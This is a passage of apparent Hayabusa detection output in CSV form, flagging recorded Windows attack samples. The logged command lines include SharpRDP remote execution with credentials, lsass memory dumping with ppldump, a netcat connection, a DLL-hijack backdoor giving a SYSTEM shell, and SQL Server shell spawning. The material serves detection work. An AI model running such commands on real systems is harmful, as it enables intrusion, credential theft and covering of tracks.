MSEDGEWIN10\sqlsvc : Parent Command: ""c:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe"" -sSQLEXPRESS",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx -2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,critical,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation/win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx -2019-11-15 17:19:02.298 +09:00,alice.insecurebank.local,1102,high,Security log was 
cleared,User: bob,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4624 LT3 AnonymousLogon Localhost - JuicyPotato.evtx -2019-11-15 17:19:17.134 +09:00,alice.insecurebank.local,4634,informational,Logoff,User: ANONYMOUS LOGON : LogonID: 0x1d12916,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4624 LT3 AnonymousLogon Localhost - JuicyPotato.evtx -2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 url.dll,FileProtocolHandler ms-browser:// : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:44:51.016 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""cmd.exe"" /c notepad.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: rundll32 url.dll,FileProtocolHandler ms-browser://",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:44:51.122 +09:00,MSEDGEWIN10,1,informational,Process 
Creation,"Command: notepad.exe : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""cmd.exe"" /c notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 url.dll,OpenURL ms-browser:// : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:46:43.819 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""cmd.exe"" /c notepad.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: rundll32 url.dll,OpenURL ms-browser://",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:46:43.836 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: notepad.exe : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""cmd.exe"" /c notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:48:17.044 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe /c start ms-browser:// : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:48:17.044 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:48:17.412 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""cmd.exe"" /c notepad.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd.exe /c start ms-browser://",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:48:17.447 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: notepad.exe : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""cmd.exe"" /c notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:48:45.243 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: explorer ms-browser:// : Path: C:\Windows\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:48:45.243 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning 
Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:48:45.293 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding : Path: C:\Windows\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-24 04:09:34.052 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: SharpRDP.exe computername=192.168.56.1 command=""C:\Temp\file.exe"" username=domain\user password=password : Path: C:\ProgramData\USOShared\SharpRDP.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sharprdp_sysmon_7_mstscax.dll.evtx -2020-02-10 17:28:12.856 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: Furutaka.exe dummy2.sys : Path: C:\Users\Public\BYOV\TDL\Furutaka.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx -2020-02-10 17:28:12.856 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx -2020-02-10 19:08:24.535 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: ppldump.exe -p lsass.exe -o a.png : Path: C:\Users\Public\BYOV\ZAM64\ppldump.exe : User: 
MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx -2020-02-10 19:08:24.535 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx -2020-02-10 19:08:24.666 +09:00,MSEDGEWIN10,10,high,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx -2020-03-07 22:17:39.984 +09:00,MSEDGEWIN10,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_SeImpersonatePriv_enabled_back_for_upnp_localsvc_4698.evtx -2020-03-09 07:11:34.340 +09:00,MSEDGEWIN10,4656,critical,LSASS Access from Non System Account,,rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_hashdump_4663_4656_lsass_access.evtx -2020-03-09 07:11:34.340 +09:00,MSEDGEWIN10,4656,high,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_hashdump_4663_4656_lsass_access.evtx -2020-03-21 14:00:16.296 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: usoclient StartInteractiveScan : Path: C:\Windows\System32\UsoClient.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:17.980 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:17.992 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:17.997 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:18.007 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:18.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:18.046 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:25.189 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:25.195 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:25.215 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll 
Hijack.evtx -2020-03-21 14:00:25.221 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:25.234 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:25.250 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:25.392 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:25.421 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT 
AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:25.443 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:25.459 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:25.499 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:25.548 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 
7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:39.226 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: nc.exe 127.0.0.1 1337 : Path: C:\Users\Public\Tools\nc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:39.226 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:39.441 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\system32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll 
Hijack.evtx -2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:54.689 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 21:35:35.026 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management : Command: sc stop CDPSvc : Path: C:\Windows\System32\sc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:35:35.026 +09:00,MSEDGEWIN10,1,low,Stop Windows Service,,rules/sigma/process_creation/win_service_stop.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:35:43.104 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management : Command: sc query CDPSvc : Path: C:\Windows\System32\sc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:35:52.013 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Program 
Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe"" /InvokerPRAID: Microsoft.MicrosoftOfficeHub notifications : Path: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\System32\RuntimeBroker.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: net start CDPSvc : Path: C:\Windows\System32\net.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,low,Service Execution,,rules/sigma/process_creation/win_service_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:35:55.897 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\net1 start CDPSvc : Path: C:\Windows\System32\net1.exe : User: MSEDGEWIN10\IEUser : Parent Command: net start CDPSvc,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:35:55.897 +09:00,MSEDGEWIN10,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:35:55.897 
+09:00,MSEDGEWIN10,1,low,Service Execution,,rules/sigma/process_creation/win_service_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:35:55.919 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\system32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 